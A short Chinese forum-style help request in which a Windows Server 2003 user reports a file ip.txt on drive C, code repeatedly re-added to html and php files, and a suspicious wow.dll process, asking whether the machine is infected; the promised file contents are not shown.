c盘多了个文件ip.txt　中毒了？

我今天看我的机器　所有的html　html php后缀的文件　里面全部自己加了

我把这代码给删除了　过会他自己又给添加上了　怎么弄一边，进程里可疑的文件有个wow.dll
我的系统是２００３　只有个　诺吨服务器版　不顶用ip.txt文件如下
